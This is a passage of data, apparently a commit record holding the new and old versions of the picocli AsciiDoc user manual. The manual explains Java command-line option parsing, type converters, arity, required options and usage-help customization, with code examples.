declaratively.\n\nUse the `separator` attribute of the `@Command` annotation to declaratively set a separator string:\n[source,java]\n----\n@Command(separator = \":\") \/\/ declaratively set a separator\nclass OptionArg {\n @Option(names = { \"-f\", \"--file\" }) String file;\n}\n----\n[source,java]\n----\nOptionArg optionArg = CommandLine.parse(new OptionArg(), \"-f:output.txt\");\nassert optionArg.file.equals(\"output.txt\");\n----\n\nAlternatively, the separator string can be changed programmatically with the `CommandLine.setSeparator(String separator)` method.\nFor example:\n[source,java]\n----\nOptionArg optionArg = new OptionArg();\nCommandLine commandLine = new CommandLine(optionArg);\n\ncommandLine.setSeparator(\":\"); \/\/ programmatically set a separator\ncommandLine.parse(\"-f:output.txt\");\nassert optionArg.file.equals(\"output.txt\");\n----\n\n\n== Type Conversion\nWhen command line options and parameters are mapped to the annotated fields,\nthe text value is converted to the type of the annotated field.\n\n=== Built-in Type Converters\nOut of the box, picocli can convert command line argument strings to any Java primitive type or their wrapper,\nFile, BigDecimal, BigInteger, InetAddress, URL, URI, Charset, UUID, regex Pattern, String, StringBuilder, CharSequence,\n`java.sql.Time` (for values in any of the `\"HH:mm\"`, `\"HH:mm:ss\"`, `\"HH:mm:ss.SSS\"`, or `\"HH:mm:ss,SSS\"` formats), and\n`java.util.Date` (for values in `\"yyyy-MM-dd\"` format).\n\n=== Custom Type Converters\nRegister a custom converter to handle data types other than the above built-in ones.\n\nCustom converters need to implement the `picocli.CommandLine.ITypeConverter` interface:\n\n[source,java]\n----\npublic interface ITypeConverter<K> {\n \/**\n * Converts the specified command line argument value to some domain object.\n * @param value the command line argument String value\n * @return the resulting domain object\n * @throws Exception an exception detailing what went wrong during the conversion\n *\/\n K convert(String value) throws Exception;\n}\n----\n\nCustom type converters can be registered with the `CommandLine.registerConverter(Class<K> cls, ITypeConverter<K> converter)`\nmethod.\n\n\nNOTE: Picocli works with Java 5 and higher, so it does not have default converters for Java 8 types like `Path` or\n`Duration`. Lambdas make it easy to register custom converters for these types:\n\n[source,java]\n----\ncommandLine.registerConverter(java.nio.file.Path.class, s -> java.nio.file.Paths.get(s));\ncommandLine.registerConverter(java.time.Duration.class, s -> java.time.Duration.parse(s));\n----\n\nAfter registering custom converters, call the `parse(String...)` method on the `CommandLine` instance where the converters are registered. The static `parse` method cannot be used. For example:\n\n[source,java]\n----\nclass App {\n @Parameters Path path;\n @Option(names = \"-d\") Duration duration;\n}\n----\n\n[source,java]\n----\nApp app = new App();\nCommandLine commandLine = new CommandLine(app);\ncommandLine.registerConverter(Path.class, s -> Paths.get(s));\ncommandLine.registerConverter(Duration.class, s -> Duration.parse(s));\n\ncommandLine.parse(\"-d\", \"PT15M\", \"file1.txt\");\nassert app.path.equals(Paths.get(\"file1.txt\"));\nassert app.duration.equals(Duration.parse(\"PT15M\"));\n----\n\n=== Arrays and Collections\n\nIMPORTANT: With array fields picocli uses reflection to discover the array element type, but with collections, Java type erasure means picocli cannot find out the generic type of the collection. For non-String collections, use the `type` attribute to explicitly tell picocli what type to convert the command line arguments to.\n\nMultiple parameters can be captured together in a single array or `Collection` field. When using a collection, use the `type` attribute to specify the collection element type. For example:\n\n[source,java]\n----\nclass Convert {\n @Option(type = java.util.regex.Pattern.class, \/\/ List elements are Pattern objects\n names = \"-patterns\",\n description = \"the regular expressions to use for the conversion\");\n List<Pattern> patterns;\n\n @Parameters(type = File.class, \/\/ convert arguments to File before adding to the List\n description = \"files to convert\")\n List<File> files;\n}\n----\n\n[source,java]\n----\nString[] args = { \"-patterns\", \"a*b\", \"[a-e][i-u]\", \"--\", \"file1.txt\", \"file2.txt\" };\nConvert convert = CommandLine.parse(new Convert(), args);\n\n\/\/ convert.patterns now has two Pattern objects\n\/\/ convert.files now has two File objects\n----\n\nNOTE: If a collection is returned from a type converter, picocli will add the values to the field, not the collection itself.\n\n=== Numeric Arguments\nNumeric values are interpreted as decimal numbers by default. If you want picocli to be more flexible, you can\nregister a custom type converter that delegates to the https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/lang\/Integer.html#decode-java.lang.String-[decode] method to convert strings to numbers.\n\nNOTE: The `decode` method looks at the prefix to determine the radix, so numbers\nstarting with `0x`, `0X` or `#` are interpreted as hexadecimal numbers, numbers starting with `0` are interpreted\nas octal numbers, and otherwise the number is interpreted as a decimal number.\n\nJava 8-style lambdas:\n[source,java]\n----\ncommandLine.registerConverter(Byte.class, s -> Byte::decode);\ncommandLine.registerConverter(Byte.TYPE, s -> Byte::decode);\ncommandLine.registerConverter(Short.class, s -> Short::decode);\ncommandLine.registerConverter(Short.TYPE, s -> Short::decode);\ncommandLine.registerConverter(Integer.class, s -> Integer::decode);\ncommandLine.registerConverter(Integer.TYPE, s -> Integer::decode);\ncommandLine.registerConverter(Long.class, s -> Long::decode);\ncommandLine.registerConverter(Long.TYPE, s -> Long::decode);\n----\n\nIn Java 5 this becomes a bit more verbose:\n[source,java]\n----\nITypeConverter<Integer> intConverter = new ITypeConverter<Integer>() {\n public Integer convert(String s) {\n return Integer.decode(s);\n }\n};\ncommandLine.registerConverter(Integer.class, intConverter);\ncommandLine.registerConverter(Integer.TYPE, intConverter);\n...\n----\n\n\n== Arity\nArity is the number of parameters that will be consumed by an option.\nMost of the time picocli will consume the right number of parameters automatically and you don't need to worry about this.\n\nWhen an option or parameters field has a type that can hold multiple values (an array or a collection),\nthe `arity` attribute lets you control exactly how many parameters are captured by this field.\n\n=== Default Arity\nThe default arity value of a field annotated with `@Option` or `@Parameters` depends on the field's type.\n\n* Boolean fields: arity is zero (no parameter is consumed - the field is set to `true` when the option name is recognized).\n* Single-valued types like `int`, `String`, `File`: arity is one (consume one parameter). Omitting the option parameter results in a ParameterException: \"Missing required parameter for field '<field-name>'\".\n* Multi-valued types like arrays or collections: consume from zero up to all available parameters.\n\n\n=== Boolean Options with Explicit Parameters\nIt is possible to explicitly specify \"true\" or \"false\" as a parameter for a boolean option by defining an explicit <<Arity: Minimum and Maximum Number of Parameters,`arity`>> attribute. A boolean option with `arity = \"0..1\"` accepts zero to one parameters, `arity = \"1\"` means the option _must_ have one parameter. For example:\n\n[source, java]\n----\nclass BooleanOptionWithParameters {\n @Option(names = \"-x\", arity = \"1\", description = \"1 mandatory parameter\")\n boolean x;\n\n @Option(names = \"-y\", arity = \"0..1\", description = \"min 0 and max 1 parameter\")\n boolean y;\n}\n----\n\nThe following ways to invoke the program will be accepted (values are not case sensitive):\n----\n<command> -x true\n<command> -x FALSE\n<command> -x TRUE -y\n<command> -x True -y False\n----\n\nBut trying to specify the `-x` option without a parameter, or with a value other than \"true\" or \"false\" (case insensitive) will result in a `ParameterException`.\n\n=== Arrays and Collections\nOption fields of type array or `List` (or any class extending `Collection`) will be able to hold multiple values.\nBy default, picocli will capture arguments into these fields until it encounters a command line argument that is\nan option name or a registered command name.\n\nThe `arity` attribute can be used to specify the exact number of required parameters, or a range with a minimum and a maximum number of parameters. The maximum can be a fixed number, or can be `\"*\"` to denote \"any number\" of parameters. For example:\n[source, java]\n----\nclass MyProgram {\n @Parameters(arity = \"3\", descriptions = \"exactly three Files\")\n File[] files;\n\n @Option(names = \"-f\", arity = \"2..4\", description = \"two to four floating point numbers\")\n double[] doubles;\n\n @Option(names = \"-s\", arity = \"1..*\", description = \"at least one string\")\n String[] strings;\n}\n----\nA `MissingParameterException` is thrown when fewer than the miminum number of required parameters is specified as command line arguments. Options with an exact number or an exact range will consume up to the maximum number of parameters.\n\nOnce the minimum number of parameters is consumed, picocli will check for each subsequent command line argument whether it is another parameter, or a new option. For example:\n\n----\n<command> -s A B C -f 1.0 2.0 3.0\n----\nThe above command line arguments will be parsed as three parameters for the `-s` option, followed by three parameters for the `-f` option.\n\n=== Ambiguous Input\nPositional parameters do not have an option name, so it is not always easy to decide where they start. The below example command line arguments will be parsed as six parameters for the `-s` option, not as three strings and three files:\n----\n<command> -s A B C file1 file2 file3\n----\n\nUsers can disambiguate the input by specifying a double dash (`--`) after the option parameters.\nThe argument `--` is interpreted as a delimiter indicating the end of options. Any following arguments are treated as positional parameters. For example, the following command line arguments will be parsed as three strings and three files:\n----\n<command> -s A B C -- file1 file2 file3\n----\n\n=== Option-Parameter Separators and Arity\n\nIMPORTANT: A separator clarifies that a parameter belongs to an option, but does not prevent subsequent parameters from also being assigned to the same option. For example:\n\n[source,java]\n----\n@Option(names = \"-opt\", arity = \"2\") List<String> values;\n@Parameters List<String> remainder;\n----\nBecause arity is 2, both parameters in the below example are assigned to the `-opt` option:\n----\n<command> -opt=val1 val2\n----\n\n\n\n== Required Options\n=== Options\nOptions can be marked `required` to make it mandatory for the user to specify them on the command line. When a required option is not specified, a `MissingParameterException` is thrown from the `parse` method. For example:\n[source, java]\n----\nclass MandatoryOption {\n @Option(names = \"-n\", required = true, description = \"mandatory number\")\n int number;\n\n @Parameters\n File[] files;\n}\n----\nThe following command line arguments would result in an exception complaining that `number` is missing:\n----\n\/\/ invalid: missing option -n\n<command> file1 file2 file3\n----\nThe following command line arguments would be accepted:\n----\n\/\/ valid: required option -n has a value\n<command> -n 123 file1 file2 file3\n----\n\n=== Parameters\nUse the `arity` attribute to make `@Parameters` mandatory:\n[source, java]\n----\nclass BothOptionAndParametersMandatory {\n @Parameters(arity = \"1..*\", descriptions = \"at least one File\")\n File[] files;\n\n @Option(names = \"-n\", required = true, description = \"mandatory number\")\n int number;\n}\n----\nThe following command line arguments would result in an exception complaining that `files` are missing:\n----\n\/\/ invalid: missing file parameters\n<command> -n 123\n----\nThe following command line arguments would be accepted:\n----\n\/\/ valid: both required fields have a value\n<command> -n 123 file1\n----\n\n\n\n== Help Options\nOptions with the attribute `help = true` are special: if one of the command line arguments is a \"help\" option, picocli will stop parsing the remaining arguments and will not check for required options.\n\n[source,java]\n----\n@Option(names = {\"-h\", \"--help\"}, help = true, description = \"display this help message\")\nboolean helpRequested;\n----\nThis is suitable for options that should trigger the usage help message or application version information being shown on the console.\n\nIt is the responsibility of the application to check the field and show the usage help message:\n[source,java]\n----\nCompress app = CommandLine.parse(new App(), args);\nif (app.helpRequested) {\n CommandLine.usage(new App(), System.err);\n return;\n}\n----\n\n== Usage Help\n=== Example\nA default picocli usage help message looks like this:\n----\nUsage: cat [-AbeEnstTuv] [--help] [--version] [FILE...]\nConcatenate FILE(s), or standard input, to standard output.\n FILE Files whose contents to display\n -A, --show-all equivalent to -vET\n -b, --number-nonblank number nonempty output lines, overrides -n\n -e equivalent to -vET\n -E, --show-ends display $ at end of each line\n -n, --number number all output lines\n -s, --squeeze-blank suppress repeated empty output lines\n -t equivalent to -vT\n -T, --show-tabs display TAB characters as ^I\n -u (ignored)\n -v, --show-nonprinting use ^ and M- notation, except for LDF and TAB\n --help display this help and exit\n --version output version information and exit\nCopyright(c) 2017\n----\n\nThe usage help message is generated from annotation attributes, like below:\n[source,java]\n----\n@Command(name = \"cat\", footer = \"Copyright(c) 2017\",\n description = \"Concatenate FILE(s), or standard input, to standard output.\")\nclass Cat {\n\n @Parameters(paramLabel = \"FILE\", description = \"Files whose contents to display\")\n List<File> files;\n\n @Option(names = \"--help\", help = true, description = \"display this help and exit\")\n boolean help;\n\n @Option(names = \"-t\", description = \"equivalent to -vT\") boolean t;\n @Option(names = \"-e\", description = \"equivalent to -vET\") boolean e;\n @Option(names = {\"-A\", \"--show-all\"}, description = \"equivalent to -vET\") boolean all;\n\n \/\/ ...\n}\n----\n\n=== Command Name\nIn the above example, the program name is taken from the `name` attribute of the `Command` annotation:\n[source,java]\n----\n@Command(name = \"cat\")\n----\nWithout a `name` attribute, picocli will show a generic `<main class>` in the synopsis:\n----\nUsage: <main class> [-AbeEnstTuv] [--help] [--version] [FILE...]\n----\n=== Parameter Labels\nNon-boolean options require a value. The usage help should explain this, and picocli shows the option parameter\nin the synopsis and in the option list. By default, the field name is shown in `<` and `>` fish brackets.\nUse the `paramLabel` attribute to display a different name. For example:\n----\nUsage: <main class> [-f=FILE] [-n=<number>] NUM <host>\n NUM number param\n host the host parameter\n -f= FILE a file\n -n= <number> a number option\n----\nSome annotated fields in the below example class have a `paramLabel` attribute and others don't:\n[source,java]\n----\n@Command(showDefaultValues = false)\nclass ParamLabels {\n @Option(names = \"-f\", paramLabel = \"FILE\", description = \"a file\") File f;\n @Option(names = \"-n\", description = \"a number option\") int number;\n @Parameters(index = \"0\", paramLabel = \"NUM\", description = \"number param\") int n;\n @Parameters(index = \"1\", description = \"the host parameter\") InetAddress host;\n}\n----\nNOTE: For demonstration purposes the above example mixes the all-uppercase (e.g., `NUM`) style label and the fish bracket (e.g., `<number>`) style labels. For real applications, mixing these label styles should be avoided. An application should consistently use only one style.\n\n=== Hidden Options and Parameters\nOptions and Parameters with the `hidden` attribute set to `true` will not be shown in the usage help message.\nThis is useful for example when a parameter at some index is captured into multiple fields:\nby default each of these fields would be shown in the usage message, which would be confusing for users.\n\nFor example, the `all` field below is annotated as `hidden = true`:\n[source,java]\n----\n@Command(showDefaultValues = false)\nclass App {\n @Parameters(index = \"0\", description = \"destination host\") InetAddress host;\n @Parameters(index = \"1\", description = \"destination port\") int port;\n @Parameters(index = \"2..*\", description = \"files to transfer\") String[] files;\n\n @Parameters(hidden = true) String[] all;\n}\n----\nThe above will generate the following usage help message, where the `all` field is not shown:\n----\nUsage: <main class> <host> <port> [<files>...]\n host destination host\n port destination port\n files files to transfer\n----\n\n\n== Customizing Usage Help\n=== Example\nThe below example demonstrates what a customized usage message can look like.\nNote how section headings with line separators can create a more spacious usage message,\nand also that options are listed in declaration order (instead of in alphabetic order).\n----\nUsage:\n\nRecord changes to the repository.\n\ngit-commit [-ap] [--fixup=<commit>] [--squash=<commit>] [-c=<commit>]\n [-C=<commit>] [-F=<file>] [-m[=<msg>...]] [<files>...]\n\nDescription:\n\nStores the current contents of the index in a new commit along with a log\nmessage from the user describing the changes.\n\nParameters:\n <files> the files to commit\n\nOptions:\n -a, --all Tell the command to automatically stage files\n that have been modified and deleted, but new\n files you have not told Git about are not\n affected.\n -p, --patch Use the interactive patch selection interface to\n chose which changes to commit\n -C, --reuse-message=<commit>\n Take an existing commit object, and reuse the log\n message and the authorship information\n (including the timestamp) when creating the\n commit.\n -c, --reedit-message=<commit>\n Like -C, but with -c the editor is invoked, so\n that the user canfurther edit the commit\n message.\n --fixup=<commit> Construct a commit message for use with rebase\n --autosquash.\n --squash=<commit> Construct a commit message for use with rebase\n --autosquash. The commitmessage subject line is\n taken from the specified commit with a prefix\n of \"squash! \". Can be used with additional\n commit message options (-m\/-c\/-C\/-F).\n -F, --file=<file> Take the commit message from the given file. Use\n - to read the message from the standard input.\n -m, --message[=<msg>...] Use the given <msg> as the commit message. If\n multiple -m options are given, their values are\n concatenated as separate paragraphs.\n----\n\n=== Section Headings\nThe above spacious layout is mainly due to the section headings:\n[code,java]\n----\n@CommandLine.Command(name = \"git-commit\",\n sortOptions = false,\n headerHeading = \"Usage:%n%n\",\n synopsisHeading = \"%n\",\n descriptionHeading = \"%nDescription:%n%n\",\n parameterListHeading = \"%nParameters:%n\",\n optionListHeading = \"%nOptions:%n\",\n header = \"Record changes to the repository.\",\n description = \"Stores the current contents of the index in a new commit \" +\n \"along with a log message from the user describing the changes.\")\nclass GitCommit { ... }\n----\n\n=== Unsorted Option List\nBy default the options list displays options in alphabetical order. Use the `sortOptions = false` attribute to display options in the order they are declared in your class.\n\n\n=== Show Default Values\nUse the `showDefaultValues = true` attribute to append the default value of the options and positional parameters to the description column.\n\n=== Abbreviated Synopsis\n=== Custom Synopsis\n=== Command Header and Description\n=== Footer\n=== Option-Parameter Separators\n\n=== Reordering Sections\nTo reorder sections of the usage message, you need to use the `CommandLine.Help` class directly. The `CommandLine::usage` method implementation looks like this:\n\n[source,java]\n----\nHelp help = new Help(new MainClass());\nStringBuilder sb = new StringBuilder()\n .append(help.headerHeading())\n .append(help.header())\n .append(help.synopsisHeading()) \/\/e.g. Usage:\n .append(help.synopsis()) \/\/e.g. <main> [OPTIONS] [ARGUMENTS]\n .append(help.descriptionHeading()) \/\/e.g. %nDescription:%n%n\n .append(help.description()) \/\/e.g. \"application description\"\n .append(help.parameterListHeading()) \/\/e.g. %nPositional parameters:%n%n\n .append(help.parameterList()) \/\/e.g. [FILE...] the files to convert\n .append(help.optionListHeading()) \/\/e.g. %nOptions:%n%n\n .append(help.optionList()) \/\/e.g. -h, --help displays this help\n .append(help.commandListHeading()) \/\/e.g. %nCommands:%n%n\n .append(help.commandList()) \/\/e.g. add adds a to b\n .append(help.footerHeading())\n .append(help.footer());\n----\nIn your application, instead of calling `CommandLine.usage(new MainClass(), System.err)`, you can alter the above code to, for example, list subcommands first, then global options and finally the parameters.\n\n=== Formatted Headings\nBy using the `Help` class directly as explained in the previous section,\nthe `xxxHeading()` methods can be passed arguments.\nThese arguments can be referenced by the format specifiers in the heading https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/Formatter.html[format strings]. For example:\n\n[source,java]\n----\n@Command(descriptionHeading = \"%nDescription (%1$tb %1$te, %1$tY)%n%n\")\nclass MainClass {}\n----\nThe `descriptionHeading` attribute is a format string with some date\/time conversion format specifiers and some line separators. Picocli will format this string with any arguments that are passed to the `Help::descriptionHeading(Object...)` method. For example:\n[source,java]\n----\nHelp help = new Help(new MainClass());\nCalendar c = new GregorianCalendar(2017, MAY, 23);\nString formatted = help.descriptionHeading(c);\n\nassert \"\\nDescription (May 23, 2017)\\n\\n\".equals(formatted);\n----\n\n\n\n== Advanced Usage Help Customization\n=== Custom Layout\n=== Table and Columns\n=== Option Renderer\n=== Parameter Renderer\n=== Param Label Renderer\n\n\n== Subcommands\n=== Registering Subcommands\n=== Usage Help for Subcommands\n\n\n\n== Subclassing to Reuse Options and Command Attributes\nPicocli will walk the class hierarchy to check for annotations, so you can declare common @Options and @Command attributes on a superclass and override these fields or attributes on a subclass.\n\nThe below example shows how common options like `help` and `version` can be declared as fields in a superclass so they are available in all subclasses. Similarly, annotating the superclass with default `@Command` attributes means subclasses won't need to set these attributes.\n\n[source,java]\n----\n@Command(synopsisHeading = \"%nUsage:%n%n\", descriptionHeading = \"%nDescription:%n%n\",\n parameterListHeading = \"%nParameters:%n%n\", optionListHeading = \"%nOptions:%n%n\",\n commandListHeading = \"%nCommands:%n%n\", showDefaultValues = false)\npublic abstract class AbstractCommand {\n\n @Option(names = { \"-h\", \"-?\", \"--help\" }, help = true,\n description = \"give this help list\")\n protected boolean helpRequested;\n\n @Option(names = { \"-V\", \"--version\" }, help = true,\n description = \"print program version\")\n protected boolean versionRequested;\n}\n----\n\nAll commands that extend `AbstractCommand` support the `--help` and `--version` options, and generate a usage help message in the same spacious style. For example:\n\n[source,java]\n----\n@Command(name = \"zip\",\n header = \"Compresses the specified FILE(s).\",\n description = \"The default action is to add or replace zipfile entries from list, \" +\n \"which can include the special name - to compress standard input.\",\n footer = \"Copyright (c) 1990-2008 Info-ZIP - Type 'zip \"-L\"' for software license.\")\npublic class ZipCommand extends AbstractCommand {\n @Option(names = { \"-o\", \"--output\" }, description = \"output file to write to\")\n private File output;\n\n @Parameter(paramLabel = \"FILE\", description = \"FILEs to compress\")\n private File[] files;\n}\n----\n\n\n== Putting it all Together\nImagine an application that takes some input files and compresses them to an output file.\n----\nCompress -o outputFile file1 file2 file3\n----\nThe program takes one option (`-o`, the output file) and one or more input files.\nOne way to accomplish this with picocli looks like this:\n\n[source, java]\n----\nimport picocli.CommandLine.*;\nimport java.io.File;\n\n@Command(name = \"Compress\", header = \"Compresses the specified input files to an output file\")\npublic class Compress {\n @Parameters(arity = \"1..*\", description = \"one or more files to compress\")\n File[] inputFiles;\n\n @Option(names = {\"-o\", \"--outfile\"}, description = \"optional output file name. If omitted directory name is used.\")\n File outputFile;\n\n @Option(names = {\"-h\", \"--help\"}, help = true, description = \"display this help message\")\n boolean helpRequested;\n\n public static void main(String... args) {\n try {\n Compress compress = CommandLine.parse(new Compress(), args);\n if (compress.helpRequested) {\n CommandLine.usage(new Compress(), System.err);\n return;\n }\n doCompress();\n } catch (ParseException ex) {\n System.err.println(ex.getMessage());\n CommandLine.usage(new Compress(), System.err);\n }\n }\n\n private void doCompress() { ... } \/\/ business logic of the application\n}\n----\n\n\n== Download\n\nNOTE: Here is the source. Copy and paste it into a file called `CommandLine.java`, add it to your project, and enjoy!\n\n[source,java]\n----\ninclude::..\/src\/main\/java\/picocli\/CommandLine.java[]\n----","old_contents":"= picocli - a mighty tiny Command Line Interface\nRemko Popma <rpopma@apache.org>\nv0.3.0, 2017-03-25\n:toc: left\n:numbered:\n:toclevels: 2\n:toc-title: Features\n\nA Java command line parsing framework in a single file, so you can include it _in source form_\nand let users run your application without an external dependency.\nProduces clean and easily tailored usage help messages.\n\nHow it works: annotate your class and picocli initializes it from the command line arguments,\nconverting the input to strongly typed values in the fields of your class.\n\n== Example\n\n[source,java]\n----\nimport picocli.CommandLine.Option;\nimport picocli.CommandLine.Parameters;\nimport java.io.File;\n\npublic class Example {\n @Option(names = { \"-v\", \"--verbose\" }, description = \"Be verbose.\")\n private boolean verbose = false;\n\n @Option(names = { \"-h\", \"--help\" }, help = true,\n description = \"Displays this help message and quits.\")\n private boolean helpRequested = false;\n\n @Parameters(arity = \"1..*\", paramLabel = \"FILE\", description = \"File(s) to process.\")\n private File[] inputFiles;\n ...\n}\n----\n\nThen invoke `CommandLine.parse` with the command line parameters and an object you want to initialize.\n\n[source,java]\n----\nString[] args = { \"-v\", \"inputFile1\", \"inputFile2\" };\nExample app = CommandLine.parse(new Example(), args);\nassert !app.helpRequested;\nassert app.verbose;\nassert app.inputFiles != null && app.inputFiles.length == 2;\n----\n\n== Options and Parameters\nCommand line arguments can be separated into _options_ (sometimes called _flags_ or _switches_), and _parameters_ (sometimes called _positional parameters_ or _operands_).\nOptions have a name, parameters are the values that follow the options.\n\n[source]\n----\n<command> -cvf=file1.txt --out result.txt abc def 123 45.6\n | | | | | | | |\n | | | | +---+---+---+--- positional parameters\n | | | |\n | | | +--- option-parameter for \"--out\"\n | | |\n | | +--- option\n | |\n | +--- option-parameter for \"-f\"\n |\n +--- clustered options \"-c\", \"-v\", and \"-f\"\n----\nPicocli has separate annotations for options and positional parameters because they work slightly differently.\n\n.Best Practices\n[TIP]\nThe https:\/\/www.gnu.org\/prep\/standards\/html_node\/Command_002dLine-Interfaces.html#Command_002dLine-Interfaces[GNU recommendations] for command line interfaces and http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/basedefs\/V1_chap12.html#tag_12_02[POSIX Utility Guidelines] may be useful. Generally, many applications use options for optional values and parameters for mandatory values.\nHowever, picocli lets you make options required if you want to, see <<Required Options>>.\n\n=== Options\nAn option must have one or more `names`. Option names usually have a prefix to distinguish them from parameters. Different operating systems and applications use https:\/\/en.wikipedia.org\/wiki\/Command-line_interface#Command-line_option[different prefixing] styles. Picocli lets you use any option name you want.\n\nTIP: You may be interested in this http:\/\/catb.org\/~esr\/writings\/taoup\/html\/ch10s05.html#id2948149[list of common option names]. Following these conventions may make your application more intuitive to use.\n\nThe below example shows options with one or more names, options that take an option parameter, and \"help\" options.\n[source,java]\n----\nclass Tar {\n @Option(names = { \"-c\", \"--create\" }, description = \"create a new archive\")\n boolean create;\n\n @Option(names = \"-x\", description = \"extract files from an archive\")\n boolean extract;\n\n @Option(names = { \"-f\", \"--file\" }, paramLabel = \"ARCHIVE\",\n description = \"use archive file or device ARCHIVE\")\n File archive;\n\n @Parameters(paramLabel = \"FILE\", description = \"one ore more files to archive\")\n File[] files;\n}\n----\nPicocli matches the option names to set the field values.\n[source,java]\n----\nString[] args = { \"-cf\", \"result.tar\", \"file1.txt\", \"file2.txt\" };\nTar tar = CommandLine.parse(new Tar(), args);\nassert tar.create;\nassert !tar.extract;\nassert tar.archive.equals(new File(\"result.tar\"));\nassert Arrays.equals(tar.files, new File[] {new File(\"file1.txt\"), new File(\"file2.txt\")});\n----\n\nPicocli supports http:\/\/pubs.opengroup.org\/onlinepubs\/9699919799\/basedefs\/V1_chap12.html#tag_12_02[POSIX clustered short options]:\nOne or more options without option-arguments, followed by at most one option that takes an option-argument, should be accepted when grouped behind one '-' delimiter.\n\n\nFor example, given this annotated class:\n[source,java]\n----\nclass ClusteredShortOptions {\n @Option(names = \"-a\") boolean a;\n @Option(names = \"-b\") boolean b;\n @Option(names = \"-c\") boolean c;\n @Option(names = \"-f\") String f;\n}\n----\nThe following command line arguments are all equivalent and parsing them will give the same result:\n\n[source,java]\n----\n<command> -abcfInputFile.txt\n<command> -a -b -c -fInputFile.txt\n<command> -a -b -c -f InputFile.txt\n<command> -a -b -c -f=InputFile.txt\n<command> -abc -f=InputFile.txt\n<command> -ab -cf=InputFile.txt\n...\n----\n\n\n=== Positional Parameters\nPositional parameters (also called operands) are the command line arguments following the options.\n\nUse the (zero-based) `index` attribute to specify exactly which parameters to capture. Omitting the `index` attribute means the field is initialized with all positional parameters (so the field should be a multi-value type like an array or a collection).\n\nThe `index` attribute accepts \"range\" values, so an annotation like `@Parameters(index=\"2..4\")` captures arguments at index 2, 3 and 4. Range values can be open-ended. For example, `@Parameters(index=\"3..*\")` captures all arguments from index 3 and up.\n\nThe advantage of capturing individual parameters in separate fields is that you can enforce strong typing. For example:\n\n[source,java]\n----\nclass PositionalParameters {\n @Parameters(hidden = true) \/\/ \"hidden\": don't show this parameter in usage help message\n List<String> allParameters; \/\/ no \"index\" attribute: captures _all_ arguments (as Strings)\n\n @Parameters(index = \"0\", \/\/ index=0: the first positional parameter\n description = \"Host name or IP address to connect to\")\n InetAddress host;\n\n @Parameters(index = \"1\", \/\/ index=1: the second positional parameter\n description = \"Port number to connect to\")\n int port;\n\n @Parameters(index = \"2..*\", description = \"the files to process\")\n File[] files;\n}\n----\n\nPicocli initializes fields with the values at the specified index in the arguments array.\n[source,java]\n----\nString[] args = { \"localhost\", \"12345\", \"file1.txt\", \"file2.txt\" };\nPositionalParameters params = CommandLine.parse(new PositionalParameters(), args);\nassert params.host.getHostName().equals(\"localhost\");\nassert params.port == 12345;\nassert Arrays.equals(params.files, new File[] {new File(\"file1.txt\"), new File(\"file2.txt\")});\nassert params.allParameters.equals(Arrays.asList(\"localhost\", \"12345\", \"file1.txt\", \"file2.txt\"));\n----\n\nSee <<Type Conversion>> for which types are supported out of the box and how to add custom types.\n\n=== Double dash (`--`)\nWhen one of the command line arguments is two dashes without any characters attached (`--`), picocli interprets all following arguments as positional parameters, even arguments that match an option name.\n\n[source,java]\n----\nclass DoubleDash {\n @Parameters\n List<String> params;\n\n @Option(names = \"--files\")\n List<String> files;\n\n @Option(names = { \"-v\", \"--verbose\" })\n boolean verbose;\n}\n----\n\nThe `--` clarifies which of the arguments are positional parameters:\n[source,java]\n----\nString[] args = { \"-v\", \"--\", \"--files\", \"file1\", \"file2\" };\nDoubleDash doubleDash = CommandLine.parse(new DoubleDash(), args);\n\nassert doubleDash.verbose;\nassert doubleDash.files == null;\nassert doubleDash.params != null && doubleDash.params.length == 3;\nassert doubleDash.params.equals(Arrays.asList(\"--files\", \"file1\", \"file2\"));\n----\n\n=== Option-Parameter Separators\n==== Default Separators\nOptions may take an _option parameter_ (also called _option-argument_).\nFor POSIX-style short options (like `-f` or `-c`), the option parameter may be attached to the option,\nor it may be separated by a space or the _separator string_ (`=` by default).\nThat is, all of the below are equivalent:\n[source,java]\n----\n<command> -foutput.txt\n<command> -f output.txt\n<command> -f=output.txt\n----\n\nLong option names (like `--file`) must be separated from their option parameter by a space or the\n_separator string_ (`=` by default). That is, the first two below examples are valid but the last example is invalid:\n[source,java]\n----\n\/\/ valid\n<command> --file output.txt\n<command> --file=output.txt\n\n\/\/ invalid (picocli will not recognize the --file option)\n<command> --fileoutput.txt\n----\n\n==== Custom Separators\nThe separator string can be customized programmatically or declaratively.\n\nUse the `separator` attribute of the `@Command` annotation to declaratively set a separator string:\n[source,java]\n----\n@Command(separator = \":\") \/\/ declaratively set a separator\nclass OptionArg {\n @Option(names = { \"-f\", \"--file\" }) String file;\n}\n----\n[source,java]\n----\nOptionArg optionArg = CommandLine.parse(new OptionArg(), \"-f:output.txt\");\nassert optionArg.file.equals(\"output.txt\");\n----\n\nAlternatively, the separator string can be changed programmatically with the `CommandLine.setSeparator(String separator)` method.\nFor example:\n[source,java]\n----\nOptionArg optionArg = new OptionArg();\nCommandLine commandLine = new CommandLine(optionArg);\n\ncommandLine.setSeparator(\":\"); \/\/ programmatically set a separator\ncommandLine.parse(\"-f:output.txt\");\nassert optionArg.file.equals(\"output.txt\");\n----\n\n\n== Type Conversion\nWhen command line options and parameters are mapped to the annotated fields,\nthe text value is converted to the type of the annotated field.\n\n=== Built-in Type Converters\nOut of the box, picocli can convert command line argument strings to any Java primitive type or their wrapper,\nFile, BigDecimal, BigInteger, InetAddress, URL, URI, Charset, UUID, regex Pattern, String, StringBuilder, CharSequence,\n`java.sql.Time` (for values in any of the `\"HH:mm\"`, `\"HH:mm:ss\"`, `\"HH:mm:ss.SSS\"`, or `\"HH:mm:ss,SSS\"` formats), and\n`java.util.Date` (for values in `\"yyyy-MM-dd\"` format).\n\n=== Custom Type Converters\nRegister a custom converter to handle data types other than the above built-in ones.\n\nCustom converters need to implement the `picocli.CommandLine.ITypeConverter` interface:\n\n[source,java]\n----\npublic interface ITypeConverter<K> {\n \/**\n * Converts the specified command line argument value to some domain object.\n * @param value the command line argument String value\n * @return the resulting domain object\n * @throws Exception an exception detailing what went wrong during the conversion\n *\/\n K convert(String value) throws Exception;\n}\n----\n\nCustom type converters can be registered with the `CommandLine.registerConverter(Class<K> cls, ITypeConverter<K> converter)`\nmethod.\n\n\nNOTE: Picocli works with Java 5 and higher, so it does not have default converters for Java 8 types like `Path` or\n`Duration`. Lambdas make it easy to register custom converters for these 